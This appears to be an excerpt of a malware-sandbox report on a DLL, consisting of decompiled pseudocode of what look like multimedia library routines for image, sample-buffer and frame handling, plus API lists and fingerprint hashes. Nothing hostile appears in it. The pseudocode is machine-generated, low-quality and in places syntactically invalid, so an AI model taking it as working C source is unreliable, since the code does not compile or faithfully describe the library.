                                                      												goto L18;
                                                      											}
                                                      										} else {
                                                      											 *_t125 = _t103;
                                                      											_t66 = E10026280();
                                                      											if(_t66 == 0) {
                                                      												L24:
                                                      												_t75 = _t119[1];
                                                      												_t92 = _t119[2];
                                                      												goto L25;
                                                      											} else {
                                                      												if(_t103 == 0) {
                                                      													L18:
                                                      													_t95 = _t119[1];
                                                      													_t104 = _t66;
                                                      													_t116 =  *_t119;
                                                      													_t82 = _t95 + 1;
                                                      													_t125[7] = _t116;
                                                      													if(_t82 >= 8) {
                                                      														if((_t66 & 0x00000001) != 0) {
                                                      															_t83 =  *_t116 & 0x000000ff;
                                                      															_t104 = _t66 + 1;
                                                      															_t116 = _t116 + 1;
                                                      															 *_t66 = _t83;
                                                      															_t82 = _t95;
                                                      														}
                                                      														if((_t104 & 0x00000002) != 0) {
                                                      															_t96 =  *_t116 & 0x0000ffff;
                                                      															_t104 = _t104 + 2;
                                                      															_t116 = _t116 + 2;
                                                      															_t82 = _t82 - 2;
                                                      															 *(_t104 - 2) = _t96;
                                                      														}
                                                      														if((_t104 & 0x00000004) == 0) {
                                                      															goto L19;
                                                      														} else {
                                                      															_t107 = _t104 + 4;
                                                      															 *(_t107 - 4) =  *_t116;
                                                      															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
                                                      															_t125 =  &(_t125[3]);
                                                      															goto L13;
                                                      														}
                                                      													} else {
                                                      														L19:
                                                      														_t67 = memcpy(_t104, _t116, _t82);
                                                      														_t125 =  &(_t125[3]);
                                                      														goto L13;
                                                      													}
                                                      													goto L36;
                                                      												}
                                                      												L13:
                                                      												 *_t119 = _t67;
                                                      												_t119[2] = _t72;
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									L16:
                                                      									return _t59;
                                                      								}
                                                      								goto L36;
                                                      								L2:
                                                      								_t125[3] =  &(_t125[0x12]);
                                                      								_t125[1] = _t73;
                                                      								_t125[2] = _t125[0x11];
                                                      								 *_t125 = _t57 +  *_t119;
                                                      								_t59 = L10093500();
                                                      								_t113 = _t59;
                                                      								if(_t59 <= 0) {
                                                      									goto L16;
                                                      								} else {
                                                      									if(_t59 < _t73) {
                                                      										goto L24;
                                                      									} else {
                                                      										goto L4;
                                                      									}
                                                      								}
                                                      								goto L36;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L36:
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf
                                                      • String ID: ambisonic ACN %d$none$user %d
                                                      • API String ID: 3083893021-4180635230
                                                      • Opcode ID: 223aa0a192477accd332f19378ca7d36c64ee90d24a02cbd76f3be9b95891286
                                                      • Instruction ID: dcc63c4345791cf420d4df1e5b10cc0e469fa513568dbd2a0042959f5c7c7fdf
                                                      • Opcode Fuzzy Hash: 223aa0a192477accd332f19378ca7d36c64ee90d24a02cbd76f3be9b95891286
                                                      • Instruction Fuzzy Hash: D7011EB4908B81CBD314EF28908152DBAE1FBD4284F94896DE4CC87355E639DA408B53
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E1001B039(void* __eax, void* __ebx) {
                                                      				void* _t82;
                                                      
                                                      				__eflags = __eax;
                                                      				if(__eflags == 0) {
                                                      					L28:
                                                      					__edx = 0xffffffea;
                                                      				} else {
                                                      					__eax = 0;
                                                      					__esp[3] = 0;
                                                      					__eax = 0;
                                                      					__esp[2] = 0;
                                                      					__eax =  *(__ebx + 0x48);
                                                      					__esp[1] =  *(__ebx + 0x48);
                                                      					__eax =  *(__ebx + 0x44);
                                                      					 *__esp =  *(__ebx + 0x44);
                                                      					__eax = E1001F6A0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
                                                      					__eflags = __eax;
                                                      					__edx = __eax;
                                                      					if(__eax < 0) {
                                                      						goto L1;
                                                      					}
                                                      					__eax =  *(__ebx + 0x20);
                                                      					__eflags = __eax;
                                                      					if(__eflags != 0) {
                                                      						L14:
                                                      						__esp[0xc] = __eax;
                                                      						__eax =  *(__ebx + 0x24);
                                                      						__esp[0xd] =  *(__ebx + 0x24);
                                                      						__eax =  *(__ebx + 0x28);
                                                      						__esp[0xe] =  *(__ebx + 0x28);
                                                      						__eax =  *(__ebx + 0x2c);
                                                      						__esp[0xf] =  *(__ebx + 0x2c);
                                                      						__eax =  *(__ebx + 0x48);
                                                      						__edi =  *(__ebx + 0x48) + 0x1f;
                                                      						__eax =  &(__esp[0xc]);
                                                      						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
                                                      						__esp[3] =  &(__esp[0xc]);
                                                      						__esp[2] = __edi;
                                                      						__eax =  *(__ebx + 0x50);
                                                      						__esp[1] =  *(__ebx + 0x50);
                                                      						__eax =  &(__esp[0x10]);
                                                      						 *__esp =  &(__esp[0x10]);
                                                      						__eax = L1001EE90(__ebx, __edi, __esi, __ebp, __eflags);
                                                      						__eflags = __eax;
                                                      						__edx = __eax;
                                                      						if(__eax < 0) {
                                                      							goto L1;
                                                      						}
                                                      						__eax = 0x20;
                                                      						__ecx = __esp[0x10];
                                                      						__edx = 0x7fffffff;
                                                      						__eflags = __esp[0x1d] - 0x20;
                                                      						__ebp = 0x7fffffff;
                                                      						__eax =  >=  ? __esp[0x1d] : 0x20;
                                                      						__esi = 0x20;
                                                      						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
                                                      						__ebp = 0x7fffffdf;
                                                      						__eflags = 0x7fffffdf - __ecx;
                                                      						if(0x7fffffdf < __ecx) {
                                                      							goto L28;
                                                      						}
                                                      						__ecx = __ecx + __eax;
                                                      						__eax = __esp[0x11];
                                                      						0x7fffffff = 0x7fffffff - __ecx;
                                                      						__eflags = 0x7fffffff - __ecx - __eax;
                                                      						if(0x7fffffff - __ecx < __eax) {
                                                      							goto L28;
                                                      						}
                                                      						__eax = __eax + __ecx;
                                                      						__ecx = __esp[0x12];
                                                      						__ebp = 0x7fffffff;
                                                      						__ebp = 0x7fffffff - __eax;
                                                      						__eflags = 0x7fffffff - __ecx;
                                                      						if(0x7fffffff < __ecx) {
                                                      							goto L28;
                                                      						}
                                                      						__eax = __eax + __ecx;
                                                      						__ecx = __esp[0x13];
                                                      						__edx = 0x7fffffff - __eax;
                                                      						__eflags = 0x7fffffff - __eax - __ecx;
                                                      						if(0x7fffffff - __eax < __ecx) {
                                                      							goto L28;
                                                      						}
                                                      						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
                                                      						 *(__ebx + 0xb8) = __eax;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							__edx = 0xfffffff4;
                                                      							L30:
                                                      							__esp[0xb] = __edx;
                                                      							__ebx = E1001A460(__ebx);
                                                      							__edx = __esp[0xb];
                                                      							goto L1;
                                                      						}
                                                      						__edx = __ebx + 0x20;
                                                      						__esp[4] = __ebx + 0x20;
                                                      						__eax =  *(__eax + 4);
                                                      						__esp[2] = __edi;
                                                      						__esp[3] = __eax;
                                                      						__eax =  *(__ebx + 0x50);
                                                      						 *__esp = __ebx;
                                                      						__esp[1] =  *(__ebx + 0x50);
                                                      						__eax = L1001EFD0(__ebx, __edi, __esi, __ebp);
                                                      						__eflags = __eax;
                                                      						__edx = __eax;
                                                      						if(__eax < 0) {
                                                      							goto L30;
                                                      						}
                                                      						__eax =  *(__ebx + 4);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__eax = __eax + __esi;
                                                      							__eflags = __eax;
                                                      							 *(__ebx + 4) = __eax;
                                                      						}
                                                      						__eax =  *(__ebx + 8);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							 *(__ebx + 8) = __eax;
                                                      						}
                                                      						__eax =  *(__ebx + 0xc);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__edx = __esi + __esi * 2;
                                                      							__eax = __eax + __esi + __esi * 2;
                                                      							__eflags = __eax;
                                                      							 *(__ebx + 0xc) = __eax;
                                                      						}
                                                      						 *(__ebx + 0x40) = __ebx;
                                                      						__edx = 0;
                                                      					} else {
                                                      						__eax = __esp[0x1d];
                                                      						__esi = 0x20;
                                                      						__ebp = 1;
                                                      						__edi = __ebx + 0x20;
                                                      						__eflags = __esp[0x1d];
                                                      						__esi =  >  ? __esp[0x1d] : 0x20;
                                                      						__eax = 0x1f;
                                                      						__esp[0xb] = 0x1f;
                                                      						while(1) {
                                                      							__eax =  *(__ebx + 0x44);
                                                      							__ebp =  ~__ebp;
                                                      							 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
                                                      							__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                      							__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                      							__eax =  *(__ebx + 0x50);
                                                      							 *__esp = __edi;
                                                      							__esp[1] =  *(__ebx + 0x50);
                                                      							__eax = L1001EAB0(__eflags);
                                                      							__eflags = __eax;
                                                      							__edx = __eax;
                                                      							if(__eax < 0) {
                                                      								goto L1;
                                                      							}
                                                      							__eax =  *(__ebx + 0x20);
                                                      							__eflags = __esp[0xb] & __eax;
                                                      							if((__esp[0xb] & __eax) != 0) {
                                                      								__ebp = __ebp + __ebp;
                                                      								__eflags = __ebp - __esi;
                                                      								if(__eflags > 0) {
                                                      									L10:
                                                      									__ecx =  *(__ebx + 0x24);
                                                      									__eax = __esi + __eax - 1;
                                                      									__edx = __esi;
                                                      									__edx =  ~__esi;
                                                      									__eax = __eax & __edx;
                                                      									 *(__ebx + 0x20) = __eax;
                                                      									__eflags = __ecx;
                                                      									if(__eflags != 0) {
                                                      										__ecx = __esi + __ecx - 1;
                                                      										 *(__ebx + 0x24) = __ecx;
                                                      										__ecx =  *(__ebx + 0x28);
                                                      										__eflags = __ecx;
                                                      										if(__eflags != 0) {
                                                      											__ecx = __esi + __ecx - 1;
                                                      											 *(__ebx + 0x28) = __ecx;
                                                      											__ecx =  *(__ebx + 0x2c);
                                                      											__eflags = __ecx;
                                                      											if(__eflags != 0) {
                                                      												__edx = __edx & __ecx;
                                                      												__eflags = __edx;
                                                      												 *(__ebx + 0x2c) = __edx;
                                                      											}
                                                      										}
                                                      									}
                                                      									goto L14;
                                                      								}
                                                      								continue;
                                                      							}
                                                      							__eflags = __eax;
                                                      							if(__eflags == 0) {
                                                      								goto L14;
                                                      							}
                                                      							goto L10;
                                                      						}
                                                      					}
                                                      				}
                                                      				L1:
                                                      				return _t82;
                                                      			}





                                                      APIs
                                                      • mv_pix_fmt_desc_get.MAIN ref: 1001B043
                                                      • mv_image_check_size.MAIN ref: 1001B069
                                                        • Part of subcall function 1001F6A0: mv_image_get_linesize.MAIN ref: 1001F6E3
                                                      • mv_image_fill_linesizes.MAIN ref: 1001B0C8
                                                        • Part of subcall function 1001EAB0: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 1001EAC6
                                                      • mv_image_fill_plane_sizes.MAIN ref: 1001B15D
                                                      • mv_buffer_alloc.MAIN ref: 1001B1CD
                                                      • mv_image_fill_pointers.MAIN ref: 1001B1FC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_pix_fmt_desc_get$mv_buffer_allocmv_image_check_sizemv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_image_get_linesize
                                                      • String ID:
                                                      • API String ID: 566543421-0
                                                      • Opcode ID: f91591d019d291e180dcf44e96ce89918f7d927db6cfc3ba89d5ff0d6a58ef0d
                                                      • Instruction ID: a5d1a7900a1a2f35fa09734171263621add282bd6d5ab2c0dd3880a3946380f0
                                                      • Opcode Fuzzy Hash: f91591d019d291e180dcf44e96ce89918f7d927db6cfc3ba89d5ff0d6a58ef0d
                                                      • Instruction Fuzzy Hash: 8A61F7B5A08B018FCB44DF69C59065ABBE1FF88240F16897DE949CB319E735E884CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E1003A4F0() {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t66;
                                                      				signed char* _t72;
                                                      				signed char* _t75;
                                                      				signed char* _t79;
                                                      				int _t83;
                                                      				void* _t85;
                                                      				signed int _t86;
                                                      				signed int _t91;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				signed int _t100;
                                                      				signed char _t101;
                                                      				unsigned int _t102;
                                                      				signed int _t103;
                                                      				void* _t105;
                                                      				signed int _t106;
                                                      				signed char* _t110;
                                                      				signed char* _t112;
                                                      				void* _t113;
                                                      				signed char* _t115;
                                                      				signed int _t116;
                                                      				signed int _t117;
                                                      				signed char* _t118;
                                                      				signed int _t119;
                                                      				signed int _t121;
                                                      				signed char** _t123;
                                                      
                                                      				_t97 = _t123[0x18];
                                                      				_t112 = _t123[0x19];
                                                      				if(_t97 > 0xb) {
                                                      					_t66 = 1;
                                                      				} else {
                                                      					_t100 =  *(0x100bc32c + (_t97 + _t97 * 4) * 4);
                                                      					_t66 =  !=  ? _t123[0x16] : 1;
                                                      				}
                                                      				 *_t123 = _t66;
                                                      				_t123[1] = 4;
                                                      				_t115 = E100266D0();
                                                      				 *(_t123[0x14]) = _t115;
                                                      				if(_t115 == 0) {
                                                      					_t123[0xb] = 0xfffffff4;
                                                      					goto L15;
                                                      				} else {
                                                      					_t123[4] = _t112;
                                                      					_t123[3] = _t97;
                                                      					 *_t123 = 0;
                                                      					_t123[2] = _t123[0x17];
                                                      					_t123[1] = _t123[0x16];
                                                      					_t72 = E1003A070(_t97, 4, _t112, _t115);
                                                      					_t123[0xb] = _t72;
                                                      					if(_t72 < 0) {
                                                      						L22:
                                                      						 *_t123 = _t123[0x14];
                                                      						E100265C0();
                                                      						return _t123[0xb];
                                                      					} else {
                                                      						 *_t123 = _t72;
                                                      						_t75 = E10026230();
                                                      						_t118 = _t75;
                                                      						if(_t75 == 0) {
                                                      							_t123[0xb] = 0xfffffff4;
                                                      							goto L22;
                                                      						} else {
                                                      							_t123[6] = _t112;
                                                      							_t123[5] = _t97;
                                                      							_t123[2] = _t118;
                                                      							 *_t123 = _t115;
                                                      							_t123[4] = _t123[0x17];
                                                      							_t123[3] = _t123[0x16];
                                                      							_t123[1] = _t123[0x15];
                                                      							_t79 = E1003A1B0();
                                                      							_t123[0xb] = _t79;
                                                      							if(_t79 < 0) {
                                                      								 *_t123 = _t118;
                                                      								L100265B0();
                                                      								goto L22;
                                                      							} else {
                                                      								if(_t97 > 0xb) {
                                                      									_t119 = 0;
                                                      									_t123[0x16] = 1;
                                                      									_t98 = 0;
                                                      									goto L9;
                                                      								} else {
                                                      									_t85 = (_t97 + _t97 * 4) * 4 + "u8";
                                                      									_t86 =  *(_t85 + 0xc);
                                                      									_t121 =  *(_t85 + 8) >> 3;
                                                      									if(_t86 == 0) {
                                                      										_t123[0x16] = 1;
                                                      										_t106 = _t123[0x17];
                                                      										_t119 = _t121 * _t123[0x16] * _t106;
                                                      										_t98 = ((_t86 & 0xffffff00 | _t97 == 0x00000005 | _t106 & 0xffffff00 | _t97 == 0x00000000) & 0x000000ff) << 7;
                                                      										goto L9;
                                                      									} else {
                                                      										_t91 = _t123[0x17];
                                                      										_t119 = _t121 * _t91;
                                                      										_t98 = ((_t91 & 0xffffff00 | _t97 == 0x00000000 | _t100 & 0xffffff00 | _t97 == 0x00000005) & 0x000000ff) << 7;
                                                      										if(_t123[0x16] > 0) {
                                                      											L9:
                                                      											_t110 = _t115;
                                                      											_t123[0xa] = _t115 + _t123[0x16] * 4;
                                                      											_t83 = _t98 * 0x1010101;
                                                      											do {
                                                      												_t101 =  *_t110;
                                                      												_t116 = _t119;
                                                      												_t113 = _t101;
                                                      												if(_t119 >= 8) {
                                                      													if((_t101 & 0x00000001) != 0) {
                                                      														 *_t101 = _t83;
                                                      														_t56 = _t119 - 1; // -1
                                                      														_t116 = _t56;
                                                      														_t113 = _t113 + 1;
                                                      													}
                                                      													if((_t113 & 0x00000002) != 0) {
                                                      														 *_t113 = _t83;
                                                      														_t116 = _t116 - 2;
                                                      														_t113 = _t113 + 2;
                                                      													}
                                                      													if((_t113 & 0x00000004) != 0) {
                                                      														 *_t113 = _t83;
                                                      														_t116 = _t116 - 4;
                                                      														_t113 = _t113 + 4;
                                                      													}
                                                      													_t102 = _t116;
                                                      													_t116 = _t116 & 0x00000003;
                                                      													_t103 = _t102 >> 2;
                                                      													_t83 = memset(_t113, _t83, _t103 << 2);
                                                      													_t123 =  &(_t123[3]);
                                                      													_t113 = _t113 + _t103;
                                                      												}
                                                      												_t117 = _t116 & 0x00000007;
                                                      												if(_t117 != 0) {
                                                      													_t105 = 0;
                                                      													do {
                                                      														 *(_t113 + _t105) = _t98;
                                                      														_t105 = _t105 + 1;
                                                      													} while (_t105 < _t117);
                                                      												}
                                                      												_t110 =  &(_t110[4]);
                                                      											} while (_t123[0xa] != _t110);
                                                      										}
                                                      									}
                                                      								}
                                                      								L15:
                                                      								return _t123[0xb];
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • mv_calloc.MAIN ref: 1003A52A
                                                      • mv_samples_get_buffer_size.MAIN ref: 1003A55E
                                                      • mv_malloc.MAIN ref: 1003A572
                                                      • mv_samples_fill_arrays.MAIN ref: 1003A5A8
                                                        • Part of subcall function 1003A1B0: mv_samples_get_buffer_size.MAIN ref: 1003A201
                                                      • mv_freep.MAIN ref: 1003A697
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_samples_get_buffer_size$mv_callocmv_freepmv_mallocmv_samples_fill_arrays
                                                      • String ID:
                                                      • API String ID: 3785048109-0
                                                      • Opcode ID: 5ae1779f3f7e2cdb2b331e1be93d4aeac89c33ba1fb156b6b974ba19d1fc6e91
                                                      • Instruction ID: bcd7097c64c988b962d1b439634854989dd960b0eefa7e233943bcd087631235
                                                      • Opcode Fuzzy Hash: 5ae1779f3f7e2cdb2b331e1be93d4aeac89c33ba1fb156b6b974ba19d1fc6e91
                                                      • Instruction Fuzzy Hash: E3518E75E087418FC701CF69D4C160AFBE4EF86395F56492EE8848B360E375E985CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strcmp$mv_opt_find2
                                                      • String ID:
                                                      • API String ID: 3181049271-0
                                                      • Opcode ID: 04fd4d9bdf331594b408d4ec8202b0f2e6e9772fccb4101c97f8bf67926a7e0f
                                                      • Instruction ID: 5aa1348898b91abb05038d254fdb3b78ff7920596d5d7f99927f5e0623b01fd6
                                                      • Opcode Fuzzy Hash: 04fd4d9bdf331594b408d4ec8202b0f2e6e9772fccb4101c97f8bf67926a7e0f
                                                      • Instruction Fuzzy Hash: 1441C57460834DCBCB50DEE5A580A5BB7E4EF857C4F85882DEC9887211EB74EC49DB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E1001C210(signed char _a4) {
                                                      				char _v60;
                                                      				intOrPtr _v116;
                                                      				intOrPtr _v224;
                                                      				intOrPtr _v228;
                                                      				intOrPtr _v324;
                                                      				intOrPtr _v328;
                                                      				intOrPtr _v332;
                                                      				intOrPtr _v336;
                                                      				intOrPtr _v340;
                                                      				char _v404;
                                                      				intOrPtr _v420;
                                                      				signed char _v424;
                                                      				intOrPtr _t49;
                                                      				signed int _t50;
                                                      				void* _t59;
                                                      				intOrPtr _t63;
                                                      				void* _t67;
                                                      				void* _t69;
                                                      				void* _t72;
                                                      				signed int _t76;
                                                      				signed char _t82;
                                                      				intOrPtr* _t83;
                                                      				signed int _t84;
                                                      				signed char _t93;
                                                      				void* _t94;
                                                      				void* _t95;
                                                      				signed int _t96;
                                                      				void* _t97;
                                                      				void* _t98;
                                                      				intOrPtr* _t99;
                                                      
                                                      				_t99 = _t98 - 0x19c;
                                                      				_t93 = _a4;
                                                      				_t49 =  *((intOrPtr*)(_t93 + 0xb8));
                                                      				if(_t49 == 0) {
                                                      					L10:
                                                      					_t82 =  &_v404;
                                                      					_t50 = 0;
                                                      					do {
                                                      						 *((intOrPtr*)(_t82 + _t50)) = 0;
                                                      						 *((intOrPtr*)(_t82 + _t50 + 4)) = 0;
                                                      						_t50 = _t50 + 8;
                                                      					} while (_t50 < 0x178);
                                                      					_v324 =  *((intOrPtr*)(_t93 + 0x50));
                                                      					_v224 =  *((intOrPtr*)(_t93 + 0xb4));
                                                      					_v336 =  *((intOrPtr*)(_t93 + 0x44));
                                                      					_v332 =  *((intOrPtr*)(_t93 + 0x48));
                                                      					_v116 =  *((intOrPtr*)(_t93 + 0x120));
                                                      					_v228 =  *((intOrPtr*)(_t93 + 0xb0));
                                                      					_v328 =  *((intOrPtr*)(_t93 + 0x4c));
                                                      					_v424 = _t93 + 0x158;
                                                      					 *_t99 =  &_v60;
                                                      					_t59 = E1000D340();
                                                      					_t94 = _t59;
                                                      					if(_t59 < 0) {
                                                      						L24:
                                                      						E1001A460(_t82);
                                                      						return _t94;
                                                      					} else {
                                                      						_t63 =  *((intOrPtr*)(_t93 + 0x128));
                                                      						if(_t63 == 0) {
                                                      							 *_t99 = _t82;
                                                      							_v424 = 0;
                                                      							_t95 = L1001ADF0();
                                                      						} else {
                                                      							_v424 = _t82;
                                                      							_v420 = 0;
                                                      							 *_t99 = _t63;
                                                      							_t95 = E1001E2F0();
                                                      						}
                                                      						if(_t95 < 0) {
                                                      							goto L23;
                                                      						} else {
                                                      							_v424 = _t93;
                                                      							 *_t99 = _t82;
                                                      							_t67 = L1001B8D0();
                                                      							_t118 = _t67;
                                                      							_t94 = _t67;
                                                      							if(_t67 < 0) {
                                                      								goto L24;
                                                      							} else {
                                                      								_t69 = E1001A6C0(_t82, 1, _t93, _t118);
                                                      								_t94 = _t69;
                                                      								if(_t69 < 0) {
                                                      									goto L24;
                                                      								} else {
                                                      									E1001A460(_t93);
                                                      									_t72 = 0;
                                                      									do {
                                                      										 *((intOrPtr*)(_t93 + _t72)) =  *((intOrPtr*)(_t99 + _t72 + 0x18));
                                                      										 *((intOrPtr*)(_t93 + _t72 + 4)) =  *((intOrPtr*)(_t99 + _t72 + 0x1c));
                                                      										_t72 = _t72 + 8;
                                                      									} while (_t72 < 0x178);
                                                      									if(_v340 == _t82) {
                                                      										 *((intOrPtr*)(_t93 + 0x40)) = _t93;
                                                      									}
                                                      									goto L22;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t83 = _t93 + 0xbc;
                                                      					_t96 = 1;
                                                      					_t97 = _t93 + 0xd8;
                                                      					L3:
                                                      					L3:
                                                      					if(_t49 != 0) {
                                                      						 *_t99 = _t49;
                                                      						_t96 = _t96 & (E1000A070() & 0xffffff00 | _t79 != 0x00000000) & 0x000000ff;
                                                      					}
                                                      					if(_t83 != _t97) {
                                                      						goto L2;
                                                      					}
                                                      					if( *((intOrPtr*)(_t93 + 0xdc)) > 0) {
                                                      						_t84 = 0;
                                                      						do {
                                                      							 *_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0xd8)) + _t84 * 4));
                                                      							_t76 = E1000A070();
                                                      							_t84 = _t84 + 1;
                                                      							_t96 = _t96 & (_t76 & 0xffffff00 | _t76 != 0x00000000) & 0x000000ff;
                                                      						} while (_t84 <  *((intOrPtr*)(_t93 + 0xdc)));
                                                      					}
                                                      					if(_t96 != 0) {
                                                      						L22:
                                                      						_t95 = 0;
                                                      						L23:
                                                      						return _t95;
                                                      					} else {
                                                      						goto L10;
                                                      					}
                                                      					goto L26;
                                                      					L2:
                                                      					_t49 =  *_t83;
                                                      					_t83 = _t83 + 4;
                                                      					__eflags = _t83;
                                                      					goto L3;
                                                      				}
                                                      				L26:
                                                      			}


































                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_buffer_is_writable$mv_channel_layout_copymv_frame_copymv_hwframe_get_buffer
                                                      • String ID:
                                                      • API String ID: 1431812533-0
                                                      • Opcode ID: 364bd59554279b40aee4642812e1f726182608b2a75209079b3376af4345f371
                                                      • Instruction ID: eaf454bc14f92c14001bd62492fec0c564a2a00f258074e35efd3c86292710f4
                                                      • Opcode Fuzzy Hash: 364bd59554279b40aee4642812e1f726182608b2a75209079b3376af4345f371
